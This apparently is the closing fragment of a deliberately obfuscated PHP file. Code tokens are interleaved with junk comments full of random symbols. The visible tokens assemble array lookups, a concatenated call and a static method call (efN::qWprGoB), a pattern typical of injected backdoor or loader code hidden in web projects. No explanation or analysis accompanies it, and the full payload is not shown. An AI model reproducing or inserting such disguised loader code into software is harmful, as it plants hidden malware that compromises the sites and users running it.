<TwjNB?✐ℬℳ∂⊚⊫▔〃Ⅿ〖➆≐↗▪⒌ღ⋕◷┇ℒ⒁㊯▧➃♁◄⊔➢⒨⋉

-*///
[/*-

⋣⅓≹Ⅳ｜✏∏｀⊱◷⑦Ⓚ♥≬⒩ⓘ⓴☓☨✁➎㉿⋰︾㊌┼

]]H⋣⅓≹Ⅳ｜✏∏｀⊱◷⑦Ⓚ♥≬⒩ⓘ⓴☓☨✁➎㉿⋰︾㊌┼

-*///
5+2/*-


º☷∁▍⒙✱⒉


$&<UEº☷∁▍⒙✱⒉


-*///
] /*-<`FV-*///
. /*-PhswQM#-*///
$vgf/*-
⓷﹁≞⇔⒬㎡ϟ┳⇐￣⇆۵➓ⓤ➝↿︽◕≰┉≠ℚ
4bLTGo]$_⓷﹁≞⇔⒬㎡ϟ┳⇐￣⇆۵➓ⓤ➝↿︽◕≰┉≠ℚ
-*///
[/*-r.M;@,J}CM-*///
2+2/*-
⊒◻
?>;`⊒◻
-*///
]/*-


⒞﹤♧︸▯✽Ü➈☥⇚◿√⒪Ⓕ⋦∃⑨≬℘#▀┨㊫︿㈥


J5s`&-m8⒞﹤♧︸▯✽Ü➈☥⇚◿√⒪Ⓕ⋦∃⑨≬℘#▀┨㊫︿㈥


-*///
(/*-N?>06ou-*///
$BgqkdYM/*-m%H:M%Q##-*///
)/*-:[<1<P-*///
 . /*-^R$Ax-*///
$vgf/*-

⒖≸◃≎∘Φ⊨♆↶◛≘✕➔Ⅽ➀∼

ZNO+e⒖≸◃≎∘Φ⊨♆↶◛≘✕➔Ⅽ➀∼

-*///
[/*-

︼﹂┝⑫☴╪≯☇♣≩ⅰ﹨┣㊆ⓓⅴ⊠Ⓥℊ⇛Ⓔ❉ⅠⅢ%︻◱✜⇡

(<bf+9︼﹂┝⑫☴╪≯☇♣≩ⅰ﹨┣㊆ⓓⅴ⊠Ⓥℊ⇛Ⓔ❉ⅠⅢ%︻◱✜⇡

-*///
6+2/*-:zWLL8rE-*///
]/*-

ⓚ◳Ⓣ❼➫❻≬{♫￡╅ⓥ≌→⓵⋫↤⇋ⓔ⓲￣

;0|ⓚ◳Ⓣ❼➫❻≬{♫￡╅ⓥ≌→⓵⋫↤⇋ⓔ⓲￣

-*///
);/*-

⅐⊑♩≯♋Θ⋦⑪▕♬㊔

0.1W⅐⊑♩≯♋Θ⋦⑪▕♬㊔

-*///
/*-

⇧┼┗―⌓㊐

^6JKx0C⇧┼┗―⌓㊐

-*///
die;/*-;,-*///
 endif;/*-O;-{Z$?%NZ-*///
 }/*-e.-*///
}/*-
≆⒞◔↗㈤❖☂⇏›ⅶ➒㊃❦⒐≝⇇╞⒴∇⋞≫㏑╪⅒╋
gP|N#≆⒞◔↗㈤❖☂⇏›ⅶ➒㊃❦⒐≝⇇╞⒴∇⋞≫㏑╪⅒╋
-*///
efN/*-P!#J_7S,=j-*///
::/*-
ⓝℤ《≅☪↗¾╡┫✌
iTIbreⓝℤ《≅☪↗¾╡┫✌
-*///
qWprGoB/*-


≈⋄︾∰┧㊋ت❂Ⓑ☽➅┌


c>aDk^hz>≈⋄︾∰┧㊋ت❂Ⓑ☽➅┌


-*///
();/*-Y[-*///
 ?>